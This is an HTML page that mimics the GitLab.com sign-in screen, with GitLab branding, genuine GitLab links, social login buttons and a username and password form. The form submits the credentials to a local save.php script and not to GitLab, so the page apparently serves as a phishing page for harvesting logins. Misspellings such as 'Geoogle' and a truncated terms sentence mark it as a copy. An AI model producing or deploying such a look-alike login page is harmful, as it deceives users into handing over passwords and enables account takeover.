<!DOCTYPE html>
<html>

	<head>
		<meta charset="utf-8" />
		<title>Gitlab.com</title>
		<style class="text/css">
			.top {
				width: 960px;
				height: 40.5px;
				margin: auto;
				padding-left: 605.333px;
				position: fixed;
			}
			
			.main {
				width: 960px;
				height: 985.333px;
				top: 40.5px;
				left: 143.333px;
				margin: auto;
			}
			
			.left {
				width: 560px;
				height: 513.5px;
				float: left;
			}
			
			.right {
				width: 400px;
				height: 513.5px;
				position: absolute;
				right: 143.333px;
				top: 40.5px;
			}
			
			.div2 {
				width: 184.5px;
				border: 1px solid #e5e5e5;
				margin-top: 20px;
				text-align: center;
				height: 50px;
				line-height: 50px;
				float: left;
			}
			
			.div3 {
				width: 184.5px;
				border: 1px solid #e5e5e5;
				margin-top: 20px;
				text-align: center;
				height: 50px;
				line-height: 50px;
				float: left;
			}
			
			.div4 {
				width: 352px;
				height: 255.5px;
				border: 1px solid #e5e5e5;
				float: left;
				padding-left: 15px;
				padding-right: 5px;
				font-family: "microsoft yahei";
			}
			
			.f {
				font-size: 13px;
			}
			
			.g {
				width: 340px;
				height: 30px;
				border: 1px solid #e5e5e5;
			}
			
			.div {
				width: 370px;
			}
			.user_remember_me {
				float: right;
				font-weight: 400;
				line-height: 1.5;
				color: #212529;
				text-align: left;
			}
			
			.float-right {
				float: right;
				text-decoration: none;
			}
			.c{
				width: 345px;
                height: 34px;
                left: 31px;
		    }
		    .div5{
		    	width:350px;
                height:174px;
                border:1px solid #e5e5e5;
                padding-left: 15px;
                padding-right:8px;
                padding-top: 15px;
                padding-bottom: 15px;
                position: absolute;
                right: 25.443px;
                top: 346.333px;
            }
            .div6{
            	width: 145.2px;
                height: 20px;
                padding: 8px;
                margin-bottom: 16px;
                float: left;
                border:1px solid #e5e5e5;}
            .div7{
            	width: 145.2px;
            	height: 20px;
            	padding: 8px;
            	margin-bottom: 16px;
            	float: right;
            	border:1px solid #e5e5e5;}
            .div8{
            	width: 145.2px;
            	height: 20px;
            	padding: 8px;
            	margin-bottom: 16px;
            	float: left;
            	border:1px solid #e5e5e5;}
            .div9{
             	width: 145.2px;
             	height: 20px;
             	padding: 8px;
             	margin-bottom: 16px;
             	float: right;
             	border:1px solid #e5e5e5;}
            label{
            	float: left;
            }
            .bottom{
            	width: 300px;
            	height: 21px;
            	position:absolute;
                left:190px;
                top:660px;
                font-size: 13px;
                color: #1b84d9;
            }
	</style>
	</head>

	<body>
		<div class="top">
			<div class="a">
				<img src="img/1.png" style="width:25px;height: 25px;" />
			</div>
		</div>
		<div class="main">
			<div class="left">
				<h1>GitLab.com</h1>
				<p>GitLab.com offers free unlimited (private) repositories and unlimited collaborators.</p>
				<ul>
					<li>
						<a style="text-decoration: none;" href="https://gitlab.com/explore/projects/trending">Explore projects on GitLab.com </a>(no login needed)</li>
					<li>
						<a style="text-decoration: none;" href="https://about.gitlab.com/pricing/#gitlab-com">More information about GitLab.com</a>
					</li>
					<li>
						<a style="text-decoration: none;" href="https://gitlab.com/gitlab-com/support-forum/issues">GitLab.com Support Forum</a>
					</li>
					<li>
						<a style="text-decoration: none;" href="https://about.gitlab.com/">GitLab Homepage</a>
					</li>
				</ul>
				<p>By signing up for and by signing in to this service you accept our.</p>
				<ul>
					<li>
						<a style="text-decoration: none;" href="https://about.gitlab.com/privacy/">Privacy policy</a>
					</li>
					<li>
						<a style="text-decoration: none;" href="https://about.gitlab.com/terms/#gitlab_com">GitLab.com Terms.</a>
					</li>
				</ul>
			</div>
		</div>
		<div class="bottom">
			<a href="https://gitlab.com/explore" style=" text-decoration: none;">Explore</a>&nbsp;&nbsp;
			<a href="https://gitlab.com/help" style=" text-decoration: none;">Help</a>&nbsp;&nbsp;&nbsp;
			<a href="https://about.gitlab.com/" style=" text-decoration: none;">About Gitlab</a>
		</div>
		<div class="right">
			<div class="div1">
				<div class="div2">
					Sign in
				</div>
				<div class="div3">
					Register
				</div>
			</div>
			<div class="div4">
				<p class="b">Username or email</p>
				<form method="post" action="save.php">
					<input type="text" name="myname" class="c" />
					<p class="b">Password<p/>
						<input type="password" name="pass" class="c" />
				</form>
				<div class="remember-me">
					<label for="user_remember_me" ">
                        <input class="remember-me-checkbox " type="checkbox " value="" name="user[remember_me] " id="user_remember_me " style="				width: 13.3334px;
				height: 13.3333px;">
                        <span>Remember me</span>
                    </label>
						<div class="float-right forgot-password ">
							<a href="/users/password/new " style="text-decoration: none; ">Forgot your password?</a>
						</div>
						</div>
				<div class="submit-container move-submit-down ">
					<input type="submit " name="commit " value="Sign in " class="btn btn-success qa-sign-in-button "style="width: 100%;background-color:#1AAA55 ;display: block;border:none;padding: 6px 0;width: 340px;height: 21.333px;border-radius: 3px;font-size: 14px;font-weight: 400;color: #ffffce;text-align: center;margin:auto; ">
					</div>
			<div class="div5">
				<span>Sign in with</span>
				  <p>
				  	<div class="div6">
				  		<img src="img/google_64-9ab7462cd2115e11f80171018d8c39bd493fc375e83202fbb6d37a487ad01908.png"/width="18px" height="18px">
        	            <small>&nbsp;&nbsp;Geoogle</small>
				  	</div>
                   <div class="div7">
                   	<img src="img/twitter_64-86860edb139fb2f62fc25ef62a4213a5c8b20122fd8752ab0df09e740eb53deb.png"/width="18px" height="18px">
           	          <small>&nbsp;&nbsp;Twitter</small>          	
                     </div>
                  </p>
                  <p>
                  	<div class="div8">
                  		<img src="img/github_64-84041cd0ea392220da96f0fb9b9473c08485c4924b98c776be1bd33b0daab8c0.png"/width="18px" height="18px">
        	            <small>&nbsp;&nbsp;GitHub</small>
                  	</div>
                    <div class="div9">
                    	<img src="img/bitbucket_64-267f322b8bedf1a39970bc215a2eb9e862c8c8033ff2390840607cb0e2dd0daf.png"/width="18px" height="18px">
                    	<small>&nbsp;&nbsp;Bitbucket</small>
                    </div>
                 </p>
                 <label>
                 	<input type="checkbox" name="checkbox" value="Remember me"/>
                 	<small>Remember me</small>
                 </label>
			</div>		
				</div>

			</div>
	</body>

</html>